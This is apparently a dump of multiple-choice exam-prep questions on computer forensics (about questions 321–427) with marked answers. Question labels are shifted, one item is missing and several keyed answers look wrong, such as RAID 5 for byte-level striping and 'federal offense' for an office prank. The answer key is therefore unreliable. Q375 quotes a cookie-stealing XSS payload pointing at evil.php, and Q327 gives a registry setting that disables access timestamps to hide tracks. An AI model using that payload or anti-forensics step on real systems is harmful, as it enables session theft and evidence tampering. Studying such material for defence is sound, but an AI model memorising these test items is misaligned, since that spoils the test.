Sally accessed the computer system that holds trade secrets of the company where she is employed. She knows she accessed it without authorization and all access (authorized and unauthorized) to this computer is monitored. To cover her tracks, Sally deleted the log entries on this computer. What among the following best describes her action?

A.
Password sniffing
B.
Brute-force attack
C.
Anti-forensics
Correct Answer
D.
Network intrusion
Question 321

Which OWASP IoT vulnerability talks about security flaws such as lack of firmware validation, lack of secure delivery, and lack of anti-rollback mechanisms on IoT devices?

A.
Insecure default settings
B.
Use of insecure or outdated components
C.
Lack of secure update mechanism
Correct Answer
D.
Insecure data transfer and storage
Question 322

Which of the following directories contains the binary files or executables required for system maintenance and administrative tasks on a Linux system?

A.
/lib
B.
/bin
C.
/usr
D.
/sbin
Correct Answer
Question 323

According to RFC 3227, which of the following is considered as the most volatile item on a typical system?

A.
Temporary system files
B.
Archival media
C.
Registers and cache
Correct Answer
D.
Kernel statistics and memory
Question 324

An investigator enters the command sqlcmd -S WIN-CQQMK62867E -e -s"." -E as part of collecting the primary data file and logs from a database. What does the “WIN-CQQMK62867E” represent?

A.
Name of the Database
B.
Name of SQL Server
Correct Answer
C.
Operating system of the system
D.
Network credentials of the database
Question 325

You are a forensic investigator who is analyzing a hard drive that was recently collected as evidence. You have been unsuccessful at locating any meaningful evidence within the file system and suspect a drive wiping utility may have been used. You have reviewed the keys within the software hive of the Windows registry and did not find any drive wiping utilities. How can you verify that drive wiping software was used on the hard drive?

A.
Check the list of installed programs
B.
Load various drive wiping utilities offline, and export previous run reports
C.
Document in your report that you suspect a drive wiping utility was used, but no evidence was found
D.
Look for distinct repeating patterns on the hard drive at the bit level
Correct Answer
Question 326

Jeff is a forensics investigator for a government agency's cybersecurity office. Jeff is tasked with acquiring a memory dump of a Windows 10 computer that was involved in a DDoS attack on the government agency's web application. Jeff is onsite to collect the memory. What tool could Jeff use?

A.
Memcheck
B.
Autopsy
C.
Volatility
Correct Answer
D.
RAMMapper
Question 327

An attacker successfully gained access to a remote Windows system and plans to install persistent backdoors on it. Before that, to avoid getting detected in future, he wants to cover his tracks by disabling the last-accessed timestamps of the machine. What would he do to achieve this?

A.
Set the registry value of HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisableLastAccessUpdate to 0
B.
Set the registry value of HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisableLastAccessUpdate to 1
Correct Answer
C.
Run the command fsutil behavior set disablelastaccess 0
D.
Run the command fsutil behavior set enablelastaccess 0
Question 328

A forensic examiner encounters a computer with a failed OS installation and the master boot record (MBR) or partition sector damaged. Which of the following tools can find and restore files and information in the disk?

A.
Helix
B.
R-Studio
Correct Answer
C.
Wireshark
D.
NetCat
Question 329

Choose the layer in iOS architecture that provides frameworks for iOS app development?

A.
Core services
B.
Media services
C.
Core OS
D.
Cocoa Touch
Correct Answer
Question 330

ISO/IEC 17025 is an accreditation for which of the following?

A.
Encryption
B.
Chain of custody
C.
CHFI issuing agency
D.
Forensics lab licensing
Correct Answer
Question 331

Recently, an internal web app that a government agency utilizes has become unresponsive. Betty, a network engineer for the government agency, has been tasked to determine the cause of the web application's unresponsiveness. Betty launches Wireshark and begins capturing the traffic on the local network. While analyzing the results, Betty noticed that a SYN flood attack was underway. How did Betty know a SYN flood attack was occurring?

A.
Wireshark capture shows multiple SYN requests and RST responses from single/multiple IP address(es)
B.
Wireshark capture does not show anything unusual and the issue is related to the web application
C.
Wireshark capture shows multiple ACK requests and SYN responses from single/multiple IP address(es)
D.
Wireshark capture shows multiple SYN requests and ACK responses from single/multiple IP address(es)
Correct Answer
Question 332

You have been asked to investigate the possibility of computer fraud in the finance department of a company. It is suspected that a staff member has been committing finance fraud by printing cheques that have not been authorized. You have exhaustively searched all data files on a bitmap image of the target computer, but have found no evidence. You suspect the files may not have been saved. What should you examine next in this case?

A.
The registry
B.
The swap file
Correct Answer
C.
The recycle bin
D.
The metadata
Question 333

Examination of a computer by a technically unauthorized person will almost always result in:

A.
Rendering any evidence found inadmissible in a court of law
Correct Answer
B.
Completely accurate results of the examination
C.
The chain of custody being fully maintained
D.
Rendering any evidence found admissible in a court of law
Question 334

“No action taken by law enforcement agencies or their agents should change data held on a computer or storage media which may subsequently be relied upon in court” — this principle is advocated by which of the following?

A.
The Association of Chief Police Officers (ACPO) Principles of Digital Evidence
Correct Answer
B.
FBI Cyber Division
C.
Scientific Working Group on Imaging Technology (SWGIT)
D.
Locard’s exchange principle
Question 335

Which of the following statements is true regarding SMTP Server?

A.
SMTP Server breaks the recipient's address into Recipient's name and his/her designation before passing it to the DNS Server
B.
SMTP Server breaks the recipient's address into Recipient's name and recipient's address before passing it to the DNS Server
C.
SMTP Server breaks the recipient's address into Recipient's name and his/her initial before passing it to the DNS Server
D.
SMTP Server breaks the recipient's address into Recipient's name and domain name before passing it to the DNS Server
Correct Answer
Question 336

You are asked to build a forensic lab and your manager has specifically informed you to use copper for lining the walls, ceilings, and floor. What is the main purpose of lining the walls, ceilings, and floor with copper?

A.
To make the lab sound proof
B.
To control the room temperature
C.
To strengthen the walls, ceilings, and floor
D.
To avoid electromagnetic emanations
Correct Answer
Question 337

Debbie has obtained a warrant to search a known pedophile's house. Debbie went to the house and executed the search warrant to seize digital devices that have been recorded as being used for downloading illicit images. She seized all digital devices except a digital camera. Why did she not collect the digital camera?

A.
Debbie overlooked the digital camera because it is not a computer system
B.
The digital camera was not listed as one of the digital devices in the warrant
Correct Answer
C.
The vehicle Debbie was using to transport the evidence was already full and could not carry more items
D.
The digital camera was old, had a cracked screen, and did not have batteries. Therefore, it could not have been used in a crime.
Question 338

To understand the impact of a malicious program after the booting process and to collect recent information from the disk partition, an investigator should evaluate the content of the:

A.
UEFI
B.
BIOS
C.
MBR
Correct Answer
D.
GRUB
Question 339

Which of the following statements is TRUE about SQL Server error logs?

A.
Forensic investigator uses SQL Server Profiler to view error log files
B.
Trace files record, user-defined events, and specific system events
C.
Error logs contain IP address of SQL Server client connections
Correct Answer
D.
SQL Server error logs record all the events occurred on the SQL Server and its databases
Question 340

Assume there is a file named myfile.txt in C: drive that contains hidden data streams. Which of the following commands would you issue to display the contents of a data stream?

A.
C:\MORE < myfile.txt:stream1
Correct Answer
B.
C:\>ECHO text_message > myfile.txt:stream1
C.
echo text > program:source_file
D.
myfile.dat:stream1
Question 341

A computer forensics investigator or forensic analyst is a specially trained professional who works with law enforcement as well as private businesses to retrieve information from computers and other types of data storage devices. For this, the analyst should have an excellent working knowledge of all aspects of the computer. Which of the following is not a duty of the analyst during a criminal investigation?

A.
To fill the chain of custody
B.
To recover data from suspect devices
C.
To enforce the security of all devices and software in the scene
Correct Answer
D.
To create an investigation report
Question 342

Which command can provide the investigators with details of all the loaded modules on a Linux-based system?

A.
list modules -a
B.
lsmod
Correct Answer
C.
plist mod -a
D.
lsof -m
Question 343

Jack is reviewing file headers to verify the file format and hopefully find more information of the file. After a careful review of the data chunks through a hex editor; Jack finds the binary value 0xFFD8. Based on the above information, what type of format is the file/image saved as?

A.
BMP
B.
GIF
C.
ASCII
D.
JPEG
Correct Answer
Question 344

In which IoT attack does the attacker use multiple forged identities to create a strong illusion of traffic congestion, affecting communication between neighboring nodes and networks?

A.
Blueborne attack
B.
Jamming attack
C.
Sybil attack
Correct Answer
D.
Replay attack
Question 345

Amber, a black hat hacker, has embedded a malware into a small enticing advertisement and posted it on a popular ad-network that displays across various websites. What is she doing?

A.
Click-jacking
B.
Compromising a legitimate site
C.
Spearphishing
D.
Malvertising
Correct Answer
Question 346

Malware analysis can be conducted in various manners. An investigator gathers a suspicious executable file and uploads it to VirusTotal in order to confirm whether the file is malicious, provide information about its functionality, and provide information that will allow to produce simple network signatures. What type of malware analysis was performed here?

A.
Dynamic
B.
Static
Correct Answer
C.
Volatile
D.
Hybrid
Question 347

Netstat is a tool for collecting Information regarding network connections. It provides a simple view of TCP and UDP connections, and their state and network traffic statistics. Which of the following commands shows you the TCP and UDP network connections, listening ports, and the identifiers?

A.
netstat -s
B.
netstat -r
C.
netstat -b
D.
netstat -ano
Correct Answer
Question 348

Cybercriminals sometimes use compromised computers to commit other crimes, which may involve using computers or networks to spread malware or illegal information. Which type of cybercrime stops users from using a device or network, or prevents a company from providing a software service to its customers?

A.
Denial-of-Service (DoS) attack
Correct Answer
B.
Ransomware attack
C.
Malware attack
D.
Phishing
Question 349

This law sets the rules for commercial email, establishes requirements for commercial messages, gives recipients the right to have you stop emailing them, and spells out tough penalties for violations.

A.
The CAN-SPAM act
Correct Answer
B.
Telemarketing act
C.
Federal Spam act
D.
European Anti-Span act
Question 350

Consider a scenario where the perpetrator of a dark web crime has uninstalled Tor browser from their computer after committing the crime. The computer has been seized by law enforcement so they can investigate it for artifacts of Tor browser usage. Which of the following should the investigators examine to establish the use of Tor browser on the suspect machine?

A.
Prefetch files
Correct Answer
B.
Swap files
C.
Files in Recycle Bin
D.
Security logs
Question 351

Which of the following malware targets Android mobile devices and installs a backdoor that remotely installs applications from an attacker-controlled server?

A.
Felix
B.
XcodeGhost
C.
xHelper
Correct Answer
D.
Unflod
Question 352

Which layer in the IoT architecture is comprised of hardware parts such as sensors, RFID tags, and devices that play an important role in data collection?

A.
Access gateway layer
B.
Middleware layer
C.
Edge technology layer
Correct Answer
D.
Application layer
Question 353

At a trading organization, three employees receive email from a senior official at ABC bank asking them to urgently fill customer-specific details at the bank’s website. As the organization already has a partnership with bank, all the employees visited the website and updated customer-related information, such as their bank account details, confidential documents, and credit card information. After a day, all the concerned customers complained that large amounts of money has been spent using their credit cards and they cannot log into their bank accounts. What kind of attack is this?

A.
Spear phishing
Correct Answer
B.
Mail bombing
C.
Whaling
D.
Email spamming
Question 354

Steve thought it would be funny to make some changes on Tom's computer at their office. Steve went into the Microsoft Windows registry and changed the keyboard mapping configuration on Tom’s computer. Now Tom is unable to log into his computer because of the changes. Could Steve’s actions warrant a cybercrime investigation?

A.
Yes, because Steve performed a denial-of-service attack on Tom’s computer
B.
Yes, because modifying computer software is always treated as a federal offense
Correct Answer
C.
No, because there is no company policy that prohibits computer pranks on co-workers
D.
No, because this scenario describes a corporate investigation
Question 355

Data is striped at a byte level across multiple drives and parity information is distributed among all member drives. What RAID level is represented here?

A.
RAID Level 5
Correct Answer
B.
RAID Level 1
C.
RAID Level 0
D.
RAID Level 3
Question 356

Brian has the job of analyzing malware for a software security company. Brian has setup a virtual environment that includes virtual machines running various versions of OSes. Additionally, Brian has setup separated virtual networks within this environment. The virtual environment does not connect to the company's intranet nor does it connect to the external Internet. With everything setup, Brian now received an executable file from client that has undergone a cyberattack. Brian ran the executable file in the virtual environment to see what it would do. What type of analysis did Brian perform?

A.
Static OS analysis
B.
Dynamic malware analysis
Correct Answer
C.
Status malware analysis
D.
Static malware analysis
Question 357

Frank, a cloud administrator in his company, needs to take backup of the OS disks of two Azure VMs that store business-critical data. Which type of Azure blob storage can he use for this purpose?

A.
Append blob
B.
Medium blob
C.
Block blob
D.
Page blob
Correct Answer
Question 358

During a forensic investigation, a large number of files were collected. The investigator needs to evaluate ownership and accountability of those files. Therefore, he begins to identify attributes such as “author name”, “organization name”, “network name”, or any additional supporting data that is meant for the owner’s identification purpose. Which term describes these attributes?

A.
Data index
B.
Metabase
C.
Data header
D.
Metadata
Correct Answer
Question 359

Simona has written a regular expression for the detection of web application-specific attack attempt that reads as /((\%3C)|<)((\%2F)| V)*[a-z0-9\%]+((\%3E)|>)/ix. Which of the following does the part ((\%3E)|>) look for?

A.
Alphanumeric string or its hex equivalent
B.
Forward slash for a closing tag or its hex equivalent
C.
Opening angle bracket or its hex equivalent
D.
Closing angle bracket or its hex equivalent
Correct Answer
Question 360

An investigator is checking a Cisco firewall log that reads as follows: Aug 21 2019 09:16:44: %ASA-1 -106021: Deny ICMP reverse path check from 10.0.0.44 to 10.0.0.33 on interface outside What does %ASA-1-106021 denote?

A.
Mnemonic message
Correct Answer
B.
Firewall action
C.
Type of request
D.
Type of traffic
Question 361

A cybercriminal is attempting to remove evidence from a Windows computer. He deletes the file evidence1.doc, sending it to Windows Recycle Bin. The cybercriminal then empties the Recycle Bin. After having been removed from the Recycle Bin, what will happen to the data?

A.
The data will be moved to new clusters in unallocated space
B.
The data will be overwritten with zeroes
C.
The data will become corrupted, making it unrecoverable
D.
The data will remain in its original clusters until it is overwritten
Correct Answer
Question 362

Which of the following is a requirement for senders as per the CAN-SPAM act?

A.
Senders should never share their physical postal address in the email
B.
Senders cannot use misleading or false header information
Correct Answer
C.
Senders must use deceptive subject lines
D.
Emails must not contain information regarding how to stop receiving emails from the sender in future
Question 363

An investigator seized a notebook device installed with a Microsoft Windows OS. Which type of files would support an investigation of the data size and structure in the device?

A.
APFS and HFS
B.
NTFS and FAT
Correct Answer
C.
Ext2 and Ext4
D.
HFS and GNUC
Question 364

Robert is a regional manager working in a reputed organization. One day, he suspected malware attack after unwanted programs started to popup after logging into his computer. The network administrator was called upon to trace out any intrusion on the computer and he/she finds that suspicious activity has taken place within Autostart locations. In this situation, which of the following tools is used by the network administrator to detect any intrusion on a system?

A.
Internet Evidence Finder
B.
Process Monitor
Correct Answer
C.
Report Viewer
D.
Hex Editor
Question 365

While collecting Active Transaction Logs using SQL Server Management Studio, the query Select * from ::fn_dblog(NULL, NULL) displays the active portion of the transaction log file. Here, assigning NULL values implies?

A.
Start and end points for log sequence numbers are specified
B.
Start and end points for log files are not specified
Correct Answer
C.
Start and end points for log sequence numbers are zero
D.
Start and end points for log files are zero
Question 366

Which among the following acts has been passed by the U.S. Congress to protect investors from the possibility of fraudulent accounting activities by corporations?

A.
Sarbanes-Oxley act of 2002
Correct Answer
B.
Gramm-Leach-Bliley act
C.
Health Insurance Probability and Accountability act of 1996
D.
Federal Information Security Management act of 2002
Question 367

Ronald, a forensic investigator, has been hired by a financial services organization to investigate an attack on their MySQL database server, which is hosted on a Windows machine named WIN-DTRAI83202X. Ronald wants to retrieve information on the changes that have been made to the database. Which of the following files should Ronald examine for this task?

A.
WIN-DTRAI83202X-bin.nnnnnn
Correct Answer
B.
relay-log.info
C.
WIN-DTRAI83202Xrelay-bin.index
D.
WIN-DTRAI83202Xslow.log
Question 368

Edgar is part of the FBI's forensic media and malware analysis team; he is analyzing a current malware and is conducting a thorough examination of the suspect system, network, and other connected devices. Edgar's approach is to execute the malware code to know how it interacts with the host system and its impacts on it. He is also using a virtual machine and a sandbox environment. What type of malware analysis is Edgar performing?

A.
Dynamic malware analysis/behavioral analysis
Correct Answer
B.
VirusTotal analysis
C.
Static analysis
D.
Malware disassembly
Question 369

When installed on a Windows machine, which port does the Tor browser use to establish a network connection via Tor nodes?

A.
7680
B.
9150/9151
Correct Answer
C.
49664/49665
D.
49667/49668
Question 370

The working of the Tor browser is based on which of the following concepts?

A.
Onion routing.
Correct Answer
B.
Static routing.
C.
Both static and default routing.
D.
Default routing.
Question 371

Fred, a cybercrime investigator for the FBI, finished storing a solid-state drive in a static resistant bag and filled out the chain of custody form. Two days later, John grabbed the solid-state drive and created a clone of it (with write blockers enabled) in order to investigate the drive. He did not document the chain of custody though. When John was finished, he put the solid-state drive back in the static resistant and placed it back in the evidence locker. A day later, the court trial began and upon presenting the evidence and the supporting documents, the chief justice outright rejected them. Which of the following statements strongly support the reason for rejecting the evidence?

A.
John did not document the chain of custody
Correct Answer
B.
Block clones cannot be created with solid-state drives
C.
John investigated the clone instead of the original evidence itself
D.
Write blockers were used while cloning the evidence
Question 372

When investigating a system, the forensics analyst discovers that malicious scripts were injected into benign and trusted websites. The attacker used a web application to send malicious code, in the form of a browser side script, to a different end-user. What attack was performed here?

A.
Cross-site scripting attack
Correct Answer
B.
SQL injection attack
C.
Cookie poisoning attack
D.
Brute-force attack
Question 373

A breach resulted from a malware attack that evaded detection and compromised the machine memory without installing any software or accessing the hard drive. What technique did the adversaries use to deliver the attack?

A.
Spyware
B.
JavaScript
C.
Trojan
D.
Fileless
Correct Answer
Question 374

Which 'Standards and Criteria' under SWGDE states that 'the agency must use hardware and software that are appropriate and effective for the seizure or examination procedure'?

A.
Standards and Criteria 1.6
B.
Standards and Criteria 1.5
Correct Answer
C.
Standards and Criteria 1.4
D.
Standards and Criteria 1.7
Question 375

You are the incident response manager at a regional bank. While performing routine auditing of web application logs, you find several attempted login submissions that contain the following strings: < SCRIPT type="text/javascript" > var adr = '../evil.php?cakemonster=' + escape(document.cookie); < /SCRIPT > What kind of attack has occurred?

A.
Cross-site scripting
Correct Answer
B.
Cross-site request forgery
C.
Buffer overflow
D.
SQL injection
Question 376

Fill in the missing Master Boot Record component. 1. Master boot code 2. Partition table 3. ____________

A.
Signature word
B.
Volume boot record
C.
Disk signature
Correct Answer
D.
Boot loader
Question 377

Which of the following Windows event logs record events related to device drives and hardware changes?

A.
Application log
B.
Security log
C.
Forwarded events log
D.
System log
Correct Answer
Question 378

Robert needs to copy an OS disk snapshot of a compromised VM to a storage account in different region for further investigation. Which of the following should he use in this scenario?

A.
Azure Active Directory
B.
Azure Monitor
C.
Azure Portal
D.
Azure CLI
Correct Answer
Question 379

Which of the following tools will allow a forensic investigator to acquire the memory dump of a suspect machine so that it may be investigated on a forensic workstation to collect evidentiary data like processes and Tor browser artifacts?

A.
Hex Editor
B.
Bulk Exactor
C.
DB Browser SQLite
D.
Belkasoft Live RAM Capturer and AccessData FTK Imager
Correct Answer
Question 380

An investigator is examining a file to identify any potentially malicious content. To avoid code execution and still be able to uncover hidden indicators of compromise (IOC), which type of examination should the investigator perform?

A.
Threat analysis
B.
Static analysis
Correct Answer
C.
Threat hunting
D.
Dynamic analysis
Question 381

You are a digital forensic investigator at a large pharmaceutical company. You are responding to a security incident where you have found a computer on the scene, and you believe the computer contains evidence that is valuable to the case. The computer is running, but the screen is blank. What should you do first?

A.
Gather the appropriate report forms, pens, and memory capture tools
B.
Unplug the computer
C.
Press a single key on the keyboard, and document which key was pressed
D.
Move the mouse slightly to wake the computer up
Correct Answer
Question 382

On NTFS file system, which of the following tools can a forensic investigator use in order to identify timestomping of evidence files?

A.
analyzeMFT
Correct Answer
B.
Exiv2
C.
Timestomp
D.
wbStego
Question 383

Which of the following Android libraries are used to render 2D (SGL) or 3D (OpenGL/ES) graphics content to the screen?

A.
OpenGL/ES and SGL
Correct Answer
B.
Webkit
C.
Surface Manager
D.
Media framework
Question 384

Jacob is a computer forensics investigator with over 10 years experience in investigations and has written over 50 articles on computer forensics. He has been called upon as a qualified witness to testify the accuracy and integrity of the technical log files gathered in an investigation into computer fraud. What is the term used for Jacob's testimony in this case?

A.
Justification
B.
Reiteration
C.
Authentication
Correct Answer
D.
Certification
Question 385

What does Locard's exchange Principle state?

A.
Anyone, or anything, entering a crime scene takes something of the scene with them, and leaves something of themselves behind when they leave
Correct Answer
B.
Any information of probative value that is either stored or transmitted in a digital form
C.
Digital evidence must have some characteristics to be disclosed in the court of law
D.
Forensic investigators face many challenges during forensics investigation of a digital crime, such as extracting, preserving, and analyzing the digital evidence
Question 386

Which Linux command when executed displays kernel ring buffers or information about device drivers loaded into the kernel?

A.
dmesg
Correct Answer
B.
pgrep
C.
fsck
D.
grep
Question 387

A file requires 10 KB space to be saved on a hard disk partition. An entire cluster of 32 KB has been allocated for this file. The remaining, unused space of 22 KB on this cluster will be identified as _______

A.
Cluster space
B.
Sector space
C.
Swap space
D.
Slack space
Correct Answer
Question 388

One technique for hiding information is to change the file extension from the correct one to one that might not be noticed by an investigator. For example, changing a .jpg extension to a .doc extension so that a picture file appears to be a document. What can an investigator examine to verify that a file has the correct extension?

A.
The sector map
B.
The File Allocation Table
C.
The file footer
D.
The file header
Correct Answer
Question 389

Identify the term that refers to individuals who, by virtue of their knowledge and expertise, express an independent opinion on a matter related to a case based on the information that is provided.

A.
Defense witness
B.
Evidence examiner
C.
Forensic examiner
D.
Expert witness
Correct Answer
Question 390

After a successful data exfiltration attack against your organization, you are conducting an internal investigation and suspect a significant portion of evidence exists on an end-user’s personal laptop. You want to be sure not to tip-off the laptop’s owner that an investigation is being conducted. What is the best option to obtain the evidence?

A.
Confiscate the laptop
B.
Request the laptop owner to voluntarily surrender it
C.
Obtain a search warrant
Correct Answer
D.
Obtain a subpoena
Question 391

In forensics, _________ are used to view stored or deleted data from both files and disk sectors.

A.
Host interfaces
B.
SIEM tools
C.
Hex editors
Correct Answer
D.
Hash algorithms
Question 392

You are an information security analyst at a large pharmaceutical company. While performing a routine review of audit logs, you have noticed a significant amount of egress traffic to various IP addresses on destination port 22 during off-peak hours. You researched some of the IP addresses and found that many of them are in Eastern Europe. What is the most likely cause of this traffic?

A.
Malicious software on internal system is downloading research data from partner SFTP servers in Eastern Europe
Correct Answer
B.
Data is being exfiltrated by an advanced persistent threat (APT)
C.
The organization's primary internal DNS server has been compromised and is performing DNS zone transfers to malicious external entities
D.
Internal systems are downloading automatic Windows updates
Question 393

What do you call the process of studying the changes that have taken place across a system or a machine after a series of actions or incidents?

A.
Host integrity Monitoring
Correct Answer
B.
System Baselining
C.
Start-up Programs Monitoring
D.
Windows Services Monitoring
Question 394

This is a statement, other than one made by the declarant while testifying at the trial or hearing, offered in evidence to prove the truth of the matter asserted. Which among the following is suitable for the above statement?

A.
Rule 1001
B.
Hearsay rule
Correct Answer
C.
Testimony by the accused
D.
Limited admissibility
Question 395

Data density of a disk drive is calculated by using _____.

A.
Track space, bit area, and slack space.
B.
Slack space, bit density, and slack density.
C.
Track density, areal density, and slack density.
D.
Track density, areal density, and bit density.
Correct Answer
Question 396

For the purpose of preserving the evidentiary chain of custody, which of the following labels is not appropriate?

A.
Relevant circumstances surrounding the collection
B.
Exact location the evidence was collected from
C.
General description of the evidence
D.
SSN of the person collecting the evidence
Correct Answer
Question 397

James, a hacker, identifies a vulnerability in a website. To exploit the vulnerability, he visits the login page and notes down the session ID that is created. He appends this session ID to the login URL and shares the link with a victim. Once the victim logs into the website using the shared URL, James reloads the webpage (containing the URL with the session ID appended) and now, he can browse the active session of the victim. Which attack did James successfully execute?

A.
Session Fixation Attack
Correct Answer
B.
Cookie Tampering
C.
Parameter Tampering
D.
Cross Site Request Forgery
Question 398

Consider a scenario where a forensic investigator is performing malware analysis on a memory dump acquired from a victim's computer. The investigator uses Volatility Framework to analyze RAM contents: which plugin helps investigator to identify hidden processes or injected code/DLL in the memory dump?

A.
mallist
B.
pslist
C.
malfind
Correct Answer
D.
malscan
Question 399

Jacob, a cybercrime investigator, joined a forensics team to participate in a criminal case involving digital evidence. After the investigator collected all the evidence and presents it to the court, the judge dropped the case and the defense attorney pressed charges against Jacob and the rest of the forensics team for unlawful search and seizure. What forensics privacy issue was not addressed prior to collecting the evidence?

A.
Compliance with the Fourth Amendment of the U.S. Constitution
Correct Answer
B.
None of these
C.
Compliance with the Second Amendment of the U.S. Constitution
D.
Compliance with the Third Amendment of the U.S. Constitution
Question 400

Consider that you are investigating a machine running an Windows OS released prior to Windows Vista. You are trying to gather information about the deleted files by examining the master database file named INFO2 located at C:\Recycler\<USER SID>\. You read an entry named "Dd5.exe". What does Dd5.exe mean?

A.
D drive. fifth file deleted, a .exe file
Correct Answer
B.
D drive, fourth file restored, a .exe file
C.
D drive, fourth file deleted, a .exe file
D.
D drive, sixth file deleted, a .exe file
Question 401

An investigator wants to extract passwords from SAM and System Files. Which tool can the investigator use to obtain a list of users, passwords, and their hashes in this case?

A.
Nuix
B.
FileMerlin
C.
PWdump7
Correct Answer
D.
HashKey
Question 402

Which of the following statements is true with respect to SSDs (solid-state drives)?

A.
Faster data access, lower power usage, and higher reliability are some of the major advantages of SSDs over HDDs
Correct Answer
B.
SSDs contain tracks, clusters, and sectors to store data
C.
Like HDDs, SSDs also have moving parts
D.
SSDs cannot store non-volatile data
Question 403

Which cloud model allows an investigator to acquire the instance of a virtual machine and initiate the forensics examination process?

A.
IaaS model
Correct Answer
B.
SaaS model
C.
PaaS model
D.
SECaaS model
Question 404

Storage location of Recycle Bin for NTFS file systems (Windows Vista and later) is located at:

A.
Drive:\RECYCLER
B.
Drive:\RECYCLED
C.
Drive:\RECYCLE.BIN
D.
Drive:\$Recycle.Bin
Correct Answer
Question 405

In Java, when multiple applications are launched, multiple Dalvik Virtual Machine instances occur that consume memory and time. To avoid that, Android implements a process that enables low memory consumption and quick start-up time. What is the process called?

A.
Init
B.
Zygote
Correct Answer
C.
Daemon
D.
Media server
Question 406

Which of the following attacks refers to unintentional download of malicious software via the Internet? Here, an attacker exploits flaws in browser software to install malware merely by the user visiting the malicious website.

A.
Internet relay chats
B.
Phishing
C.
Drive-by downloads
Correct Answer
D.
Malvertising
Question 407

An EC2 instance storing critical data of a company got infected with malware. The forensics team took the EBS volume snapshot of the affected instance to perform further analysis and collected other data of evidentiary value. What should be their next step?

A.
They should keep the instance running as it stores critical data
B.
They should terminate all instances connected via the same VPC
C.
They should pause the running instance
D.
They should terminate the instance after taking necessary backup
Correct Answer
Question 408

Cloud forensic investigations impose challenges related to multi-jurisdiction and multi-tenancy aspects. To have a better understanding of the roles and responsibilities between the cloud service provider (CSP) and the client, which document should the forensic investigator review?

A.
National and local regulation
B.
Service level agreement
Correct Answer
C.
Key performance indicator
D.
Service level management
Question 409

William is examining a log entry that reads 192.168.0.1 - - [18/Jan/2020:12:42:29 +0000] "GET / HTTP/1.1" 200 1861. Which of the following logs does the log entry belong to?

A.
Apache error log
B.
IIS log
C.
The combined log format of Apache access log
D.
The common log format of Apache access log
Correct Answer
Question 410

Adam is thinking of establishing a hospital in the US and approaches John, a software developer to build a site and host it for him on one of the servers, which would be used to store patient health records. He has learned from his legal advisors that he needs to have the server's log data reviewed and managed according to certain standards and regulations. Which of the following regulations are the legal advisors referring to?

A.
Data Protection Act of 2018
B.
Health Insurance Portability and Accountability Act of 1996 (HIPAA)
Correct Answer
C.
Electronic Communications Privacy Act
D.
Payment Card Industry Data Security Standard (PCI DSS)
Question 411

The information security manager at a national legal firm has received several alerts from the intrusion detection system that a known attack signature was detected against the organization's file server. What should the information security manager do first?

A.
Disconnect the file server from the network
B.
Update the anti-virus definitions on the file server
C.
Report the incident to senior management
D.
Manually investigate to verify that an incident has occurred
Correct Answer
Question 412

Which of the following Registry components include offsets to other cells as well as the LastWrite time for the key?

A.
Key cell
Correct Answer
B.
Value cell
C.
Value list cell
D.
Security descriptor cell
Question 413

You are assigned a task to examine the log files pertaining to MyISAM storage engine. While examining, you are asked to perform a recovery operation on a MyISAM log file. Which among the following MySQL Utilities allow you to do so?

A.
mysqldump
B.
myisamaccess
C.
myisamlog
Correct Answer
D.
myisamchk
Question 414

Annie is searching for certain deleted files on a system running Windows XP OS. Where will she find the files if they were not completely deleted from the system?

A.
C: $Recycled.Bin
B.
C:\RECYCLER
Correct Answer
C.
C:\$Recycle.Bin
D.
C:\$RECYCLER
Question 415

Williamson is a forensic investigator. While investigating a case of data breach at a company, he is maintaining a document that records details such as the forensic processes applied on the collected evidence, particulars of people handling it, the dates and times when it is being handled, and the place of storage of the evidence. What do you call this document?

A.
Chain of custody
Correct Answer
B.
Authorization form
C.
Log book
D.
Consent form
Question 416

Smith, an employee of a reputed forensic investigation firm, has been hired by a private organization to investigate a laptop that is suspected to be involved in the hacking of the organization's DC server. Smith wants to find all the values typed into the Run box in the Start menu. Which of the following registry keys will Smith check to find the above information?

A.
RunMRU key
Correct Answer
B.
MountedDevices key
C.
UserAssist Key
D.
TypedURLs key
Question 417

Matthew has been assigned the task of analyzing a suspicious MS Office document via static analysis over an Ubuntu-based forensic machine. He wants to see what type of document it is, whether it is encrypted, or contains any flash objects/VBA macros. Which of the following python-based script should he run to get relevant information?

A.
pdfid.py
B.
oleform.py
C.
oledir.py
D.
oleid.py
Correct Answer
Question 418

Smith, a network administrator with a large MNC, was the first to arrive at a suspected crime scene involving criminal use of compromised computers. What should be his first response while maintaining the integrity of evidence?

A.
Open the systems, remove the hard disk and secure it
B.
Record the system state by taking photographs of physical system and the display
Correct Answer
C.
Switch-off the system and carry them to the laboratory
D.
Perform data acquisition without disturbing the state of the systems
Question 419

Jacky encrypts her documents using a password. It is known that she uses her daughter's year of birth as part of the password. Which password cracking technique would be optimal to crack her password?

A.
Hybrid attack
B.
Brute force attack
C.
Syllable attack
D.
Rule-based attack
Correct Answer
Question 420

Which set of anti-forensic tools/techniques allows a program to compress and/or encrypt an executable file to hide attack tools from being detected by reverse-engineering or scanning?

A.
Emulators
B.
Botnets
C.
Parkers
Correct Answer
D.
Password crackers
Question 421

What command-line tool enables forensic investigator to establish communication between an Android device and a forensic workstation in order to perform data acquisition from the device?

A.
SDK Manager
B.
APK Analyzer
C.
Xcode
D.
Android Debug Bridge
Correct Answer
Question 422

Which of the following statements pertaining to First Response is true?

A.
First Response is part of the post-investigation phase
B.
First Response is neither a part of pre-investigation phase nor a part of investigation phase. It only involves attending to a crime scene first and taking measures that assist forensic investigators in executing their tasks in the investigation phase more effectively
C.
First Response is part of the investigation phase
Correct Answer
D.
First Response is part of the pre-investigation phase
Question 423

Which following forensic tool allows investigator to detect and extract hidden streams on NTFS drive?

A.
Autopsy
B.
Stream Detector
Correct Answer
C.
analyzeMFT
D.
TimeStomp
Question 424

Which of the following is the most effective tool for acquiring volatile data from a Windows-based system?

A.
Coreography
B.
Datagrab
C.
Helix
Correct Answer
D.
Ethereal
Question 425

During an investigation, the first responders stored mobile devices in specific containers to provide network isolation. All the following are examples of such pieces of equipment, except for:

A.
Faraday bag
B.
Wireless StrongHold bag
C.
VirtualBox
Correct Answer
D.
RF shield box
Question 427

Place the following in order of volatility from most volatile to the least volatile.

A.
Archival media, temporary file systems, disk storage, archival media, register and cache
B.
Register and cache, temporary file systems, routing tables, disk storage, archival media
C.
Registers and cache, routing tables, temporary file systems, archival media, disk storage
D.
Registers and cache, routing tables, temporary file systems, disk storage, archival media
Correct Answer
Question 428

